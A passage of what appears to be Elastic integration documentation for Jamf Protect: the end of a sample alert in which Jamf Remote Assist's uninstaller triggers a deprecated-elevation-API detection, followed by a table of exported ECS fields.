23A344)\",\"ips\":[\"192.168.11.226\"],\"serial\":\"Z2C23RW4DY\",\"hostname\":\"VMAC-2C23RW4DY\",\"protectVersion\":\"5.1.0.4\",\"provisioningUDID\":\"0000FE00-8406CE28ECFC4DAB\"},\"match\":{\"tags\":[\"MITREattack\",\"DefenseEvasion\",\"T1548.004\",\"AbuseElevationControlMechanism\",\"PrivilegeEscalation\"],\"uuid\":\"7232d4a4-2289-49ba-a218-215ef3d62ec4\",\"event\":{\"pid\":3136,\"type\":1,\"uuid\":\"e19385fc-6077-4d00-ad56-b89eec15e730\",\"subType\":7,\"timestamp\":1698841238.851668},\"facts\":[{\"name\":\"User Elevated Action\",\"tags\":[\"DefenseEvasion\",\"T1548.004\",\"PrivilegeEscalation\",\"MITREattack\",\"AbuseElevationControlMechanism\"],\"uuid\":\"db094865-99c2-416c-9f06-e7740d9e8a20\",\"human\":\"Application used deprecated elevation API\",\"actions\":[{\"name\":\"Report\"}],\"context\":[],\"version\":1,\"severity\":0}],\"custom\":false,\"actions\":[{\"name\":\"Report\"}],\"context\":[],\"severity\":0},\"related\":{\"files\":[],\"users\":[{\"uid\":0,\"name\":\"root\",\"uuid\":\"Z2C23RW4DY0\"},{\"uid\":501,\"name\":\"local-admin\",\"uuid\":\"Z2C23RW4DY1f5\"}],\"groups\":[{\"gid\":0,\"name\":\"wheel\",\"uuid\":\"Z2C23RW4DY0\"},{\"gid\":20,\"name\":\"staff\",\"uuid\":\"Z2C23RW4DY14\"}],\"binaries\":[{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35273,\"path\":\"/usr/libexec/security_authtrampoline\",\"size\":134768,\"inode\":1152921500312504800,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"82e899cb1c8a42b74653b05ca526d5feae92b9f6\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.security_authtrampoline\",\"cdhash\":\"rbIoddPMz9MoMMZl1ATihY8wlMk=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"size\":6929392,\"inode\":4631313,\"xattrs\":[],\"changed\":1698101729,\"created\":1697718684,\"sha1hex\":\"4f16310b5f518c8b0bd29afdfb8e2ca7a5a0b0b3\",\"accessed\":1698818094,\"modified\":1697718684,\"sha256hex\":\"b6e3e8d03cb0b11bf0e30649fcb3755e58babd00f942e07f85b656980fe4d9ff\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.jamf.remoteassist.launcher\",\"cdhash\":\"OkjDuX0cFaDreH32s6FfHKg1FqE=\",\"status\":0,\"teamid\":\"483DWKW443\",\"signerType\":2,\"authorities\":[\"Developer ID Application: JAMF Software (483DWKW443)\",\"Developer ID Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35145,\"path\":\"/usr/bin/sudo\",\"size\":1446192,\"inode\":1152921500312502700,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"8e860430a91946640dcc5161c726a39dc8576cc3\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"38e7f57d53e3c8847ea3361085e13d87849b31f588bfe9e9e1c02abfac542aef\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.sudo\",\"cdhash\":\"LZl8hBA1BePrgPrqw+Ap/HR6YUg=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33133,\"path\":\"/bin/bash\",\"size\":1310224,\"inode\":1152921500312501200,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"db9d08f69e6bff5c31ff7d7a0da06a0a8311c393\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"4c70b5307a375045d205dbff19dc96fdaa25a77061446259204657c97726c70a\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.bash\",\"cdhash\":\"w8D5iqHkJJxjGQGuFQLtfzG2Wes=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/bin/zsh\",\"size\":1377584,\"inode\":1152921500312501200,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"959ade1e4967a51eb8757d723d5040090fdfcb5c\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"ccb1ba009baa2353c3806fe4f56349497b542104b5104e7a82b8f8ce2304ec03\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.zsh\",\"cdhash\":\"f8w59TUpUrUhesGyuRBvXldP3Q0=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35181,\"path\":\"/usr/bin/login\",\"size\":172032,\"inode\":1152921500312502100,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"875c999ee4df1a16d7654636714f852f55d1cc57\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"4fa5b402145c8228454641e232d3d4b4152df143bf3ffda98d75c200e661baf4\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.login\",\"cdhash\":\"MnR8eKbXO4v5eUokTXLWEDUfCVY=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[\"com.apple.private.endpoint-security.submit.login\",\"com.apple.private.security.clear-library-validation\"],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\",\"size\":2222656,\"inode\":1152921500311913100,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"14c2df1ea5a91fed7527fcfdff74268e19524eb3\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"17a6a338efd6052c871a6da90b81c483a3edea43c056326587735b89feaf189c\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.Terminal\",\"cdhash\":\"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false}],\"processes\":[{\"gid\":0,\"pid\":3136,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"/usr/libexec/security_authtrampoline\",\"/Library/Application Support/JAMF/Remote Assist/Wipe\",\"auth 16\"],\"name\":\"security_authtrampoline\",\"path\":\"/usr/libexec/security_authtrampoline\",\"pgid\":3096,\"ppid\":3099,\"rgid\":0,\"ruid\":0,\"uuid\":\"c821d617-2ce5-4475-aae6-c428a1ad9e8c\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.security_authtrampoline\",\"cdhash\":\"rbIoddPMz9MoMMZl1ATihY8wlMk=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841238,\"originalParentPID\":3099,\"processIdentifier\":6750},{\"gid\":0,\"pid\":3099,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"/operation=connector.uninstall\"],\"name\":\"jamfRemoteAssistLauncher\",\"path\":\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"pgid\":3096,\"ppid\":3098,\"rgid\":0,\"ruid\":0,\"uuid\":\"a382cfda-8964-4388-8c19-49d4eaef2ae7\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.jamf.remoteassist.launcher\",\"cdhash\":\"OkjDuX0cFaDreH32s6FfHKg1FqE=\",\"status\":0,\"teamid\":\"483DWKW443\",\"signerType\":2,\"authorities\":[\"Developer ID Application: JAMF Software (483DWKW443)\",\"Developer ID Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841236,\"originalParentPID\":3098,\"processIdentifier\":6654},{\"gid\":20,\"pid\":3098,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"sudo\",\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"/operation=connector.uninstall\"],\"name\":\"sudo\",\"path\":\"/usr/bin/sudo\",\"pgid\":3096,\"ppid\":3096,\"rgid\":20,\"ruid\":501,\"uuid\":\"31060be9-a210-4e18-bec5-2b0b6c482563\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.sudo\",\"cdhash\":\"LZl8hBA1BePrgPrqw+Ap/HR6YUg=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841234,\"originalParentPID\":3096,\"processIdentifier\":6652},{\"gid\":20,\"pid\":3096,\"tty\":\"/dev/ttys016\",\"uid\":501,\"args\":[\"/bin/sh\",\"/Library/Application Support/JAMF/Remote Assist/Uninstall\"],\"name\":\"bash\",\"path\":\"/bin/bash\",\"pgid\":3096,\"ppid\":3063,\"rgid\":20,\"ruid\":501,\"uuid\":\"6600050c-406a-4cd6-8c31-1eefe04fea65\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.bash\",\"cdhash\":\"w8D5iqHkJJxjGQGuFQLtfzG2Wes=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":3063,\"processIdentifier\":6650},{\"gid\":20,\"pid\":3063,\"uid\":501,\"args\":[\"-zsh\"],\"name\":\"zsh\",\"path\":\"/bin/zsh\",\"pgid\":3063,\"ppid\":3062,\"rgid\":20,\"ruid\":501,\"uuid\":\"f596588c-0db5-4fdb-bd64-95584398c596\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.zsh\",\"cdhash\":\"f8w59TUpUrUhesGyuRBvXldP3Q0=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":3062,\"processIdentifier\":6608},{\"gid\":20,\"pid\":3062,\"uid\":0,\"args\":[\"login\",\"-pf\",\"local-admin\"],\"name\":\"login\",\"path\":\"/usr/bin/login\",\"pgid\":3062,\"ppid\":765,\"rgid\":20,\"ruid\":501,\"uuid\":\"bfd4dcd0-5054-4cab-9b8f-1e650d977771\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.login\",\"cdhash\":\"MnR8eKbXO4v5eUokTXLWEDUfCVY=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[\"com.apple.private.endpoint-security.submit.login\",\"com.apple.private.security.clear-library-validation\"],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":765,\"processIdentifier\":6606},{\"gid\":20,\"pid\":765,\"uid\":501,\"args\":[\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\"],\"name\":\"Terminal\",\"path\":\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\",\"pgid\":765,\"ppid\":1,\"rgid\":20,\"ruid\":501,\"uuid\":\"7fb1cc18-b1a9-467a-880a-3a6e86960880\",\"flags\":[],\"appPath\":\"/System/Applications/Utilities/Terminal.app\",\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.Terminal\",\"cdhash\":\"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698840671,\"originalParentPID\":1,\"processIdentifier\":1812}]},\"eventType\":\"GPProcessEvent\"}}", + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/usr/libexec/security_authtrampoline", + "/Library/Application Support/JAMF/Remote Assist/Wipe", + "auth 16" + ], + "code_signature": { + "signing_id": "com.apple.security_authtrampoline", + "status": "No error.", + "team_id": "" + }, + "entity_id": "c821d617-2ce5-4475-aae6-c428a1ad9e8c", + "executable": "/usr/libexec/security_authtrampoline", + "group_leader": { + "executable": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", + "name": "Terminal", + "pid": 765, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2023-11-01T12:11:11Z", + "user": { + "id": "501" + } + }, + "hash": { + "sha1": "82e899cb1c8a42b74653b05ca526d5feae92b9f6", + "sha256": "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32" + }, + "name": "security_authtrampoline", + "parent": { + "code_signature": { + "signing_id": "com.jamf.remoteassist.launcher", + "status": "No error.", + "team_id": "483DWKW443" + }, + "executable": "/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher", + "name": "jamfRemoteAssistLauncher", + "pid": 3099, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-01T12:20:36Z", + "user": { + "id": "0" + } + }, + "pid": 3136, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-01T12:20:38Z", + "tty": "/dev/ttys016", + "user": { + "id": "0" + } + }, + "related": { + "hash": [ + "82e899cb1c8a42b74653b05ca526d5feae92b9f6", + "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32" + ], + "user": [ + "root", + "local-admin", + "" + ] + }, + "tags": [ + "DefenseEvasion", + "T1548.004", + "PrivilegeEscalation", + "MITREattack", + "AbuseElevationControlMechanism" + ], + "threat": { + "framework": "MITRE ATT\u0026CK", + "software": { + "platforms": "macOS" + } + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| container.image.tag | Container image tags. | keyword | +| container.runtime | Runtime managing this container. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| destination.as.organization.name | Organization name. | keyword | +| destination.as.organization.name.text | Multi-field of `destination.as.organization.name`. | match_only_text | +| destination.domain | The domain name of the destination system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| destination.geo.city_name | City name. | keyword | +| destination.geo.continent_name | Name of the continent. | keyword | +| destination.geo.country_iso_code | Country ISO code. | keyword | +| destination.geo.country_name | Country name. | keyword | +| destination.geo.location | Longitude and latitude. | geo_point | +| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | +| destination.port | Port of the destination. | long | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Name of the dataset. | constant_keyword | +| event.duration | Duration of the event in nanoseconds. If `event.start` and `event.end` are known this value should be the difference between the end and start time. | long | +| event.end | `event.end` contains the date when the event ended or when the activity was last observed. | date | +| event.id | Unique ID to describe the event. | keyword | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.start | `event.start` contains the date when the event started or when the activity was first observed. | date | +| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword | +| file.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword | +| file.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| file.extension | File extension, excluding the leading dot. Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | +| file.gid | Primary group ID (GID) of the file. | keyword | +| file.hash.md5 | MD5 hash. | keyword | +| file.hash.sha1 | SHA1 hash. | keyword | +| file.hash.sha256 | SHA256 hash. | keyword | +| file.hash.sha512 | SHA512 hash. | keyword | +| file.inode | Inode representing the file in the filesystem. | keyword | +| file.mode | Mode of the file in octal representation. | keyword | +| file.name | Name of the file including the extension, without the directory. | keyword | +| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| file.path.text | Multi-field of `file.path`. | match_only_text | +| file.size | File size in bytes. Only relevant when `file.type` is "file". | long | +| file.uid | The user ID (UID) or security identifier (SID) of the file owner. | keyword | +| group.id | Unique identifier for the group on the system/platform. | keyword | +| group.name | Name of the group. | keyword | +| jamf_protect.alerts.timestamp_nanoseconds | The timestamp in Epoch nanoseconds. | date | +| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | +| log.logger | The name of the logger inside an application. This is usually the name of the class which initialized the logger, or can be a custom name. | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| network.direction | Direction of the network traffic. When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword | +| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword | +| observer.name | Custom name of the observer. This is a name that can be given to an observer. This can be helpful for example if multiple firewalls of the same model are used in an organization. If no custom name is needed, the field can be left empty. | keyword | +| observer.product | The product name of the observer. | keyword | +| observer.type | The type of the observer the data is coming from. There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. | keyword | +| observer.vendor | Vendor name of the observer. | keyword | +| process.args | Array of process arguments, starting with the absolute path to the executable. May be filtered to protect sensitive information. | keyword | +| process.args_count | Length of the process.args array. This field can be useful for querying or performing bucket analysis on how many arguments were provided to start a process. More arguments may be an indication of suspicious activity. | long | +| process.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword | +| process.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword | +| process.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| process.command_line | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | wildcard | +| process.command_line.text | Multi-field of `process.command_line`. | match_only_text | +| process.entity_id | Unique identifier for the process. The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. | keyword | +| process.executable | Absolute path to the process executable. | keyword | +| process.executable.text | Multi-field of `process.executable`. | match_only_text | +| process.exit_code | The exit code of the process, if this is a termination event. The field should be absent if there is no exit code for the event (e.g. process start). | long | +| process.group_leader.executable | Absolute path to the process executable. | keyword | +| process.group_leader.executable.text | Multi-field of `process.group_leader.executable`. | match_only_text | +| process.group_leader.group.id | Unique identifier for the group on the system/platform. | keyword | +| process.group_leader.name | Process name. Sometimes called program name or similar. | keyword | +| process.group_leader.name.text | Multi-field of `process.group_leader.name`. | match_only_text | +| process.group_leader.pid | Process id. | long | +| process.group_leader.real_group.id | Unique identifier for the group on the system/platform. | keyword | +| process.group_leader.real_user.id | Unique identifier of the user. | keyword | +| process.group_leader.start | The time the process started. | date | +| process.group_leader.user.id | Unique identifier of the user. | keyword | +| process.hash.md5 | MD5 hash. | keyword | +| process.hash.sha1 | SHA1 hash. | keyword | +| process.hash.sha256 | SHA256 hash. | keyword | +| process.name | Process name. Sometimes called program name or similar. | keyword | +| process.name.text | Multi-field of `process.name`. | match_only_text | +| process.parent.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword | +| process.parent.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword | +| process.parent.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| process.parent.entity_id | Unique identifier for the process. The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. | keyword | +| process.parent.executable | Absolute path to the process executable. | keyword | +| process.parent.executable.text | Multi-field of `process.parent.executable`. | match_only_text | +| process.parent.name | Process name. Sometimes called program name or similar. | keyword | +| process.parent.name.text | Multi-field of `process.parent.name`. | match_only_text | +| process.parent.pid | Process id. | long | +| process.parent.real_group.id | Unique identifier for the group on the system/platform. | keyword | +| process.parent.real_user.id | Unique identifier of the user. | keyword | +| process.parent.start | The time the process started. | date | +| process.parent.user.id | Unique identifier of the user. | keyword | +| process.pid | Process id. | long | +| process.real_group.id | Unique identifier for the group on the system/platform. | keyword | +| process.real_user.id | Unique identifier of the user. | keyword | +| process.start | The time the process started. | date | +| process.tty | Information about the controlling TTY device. If set, the process belongs to an interactive session. | object | +| process.user.id | Unique identifier of the user. | keyword | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| rule.description | The description of the rule generating the event. | keyword | +| rule.name | The name of the rule or signature generating the event. | keyword | +| source.ip | IP address of the source (IPv4 or IPv6). | ip | +| source.port | Port of the source. | long | +| tags | List of keywords used to tag each event. | keyword | +| threat.enrichments | A list of associated indicators objects enriching the event, and the context of that association/enrichment. | nested | +| threat.framework | Name of the threat framework used to further categorize and classify the tactic and technique of the reported threat. Framework classification can be provided by detecting systems, evaluated at ingest time, or retrospectively tagged to events. | keyword | +| threat.software.platforms | The platforms of the software used by this threat to conduct behavior commonly modeled using MITRE ATT&CK®. While not required, you can use MITRE ATT&CK® software platform values. | keyword | +| threat.tactic.id | The id of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) | keyword | +| threat.tactic.name | Name of the type of tactic used by this threat. You can use a MITRE ATT&CK® 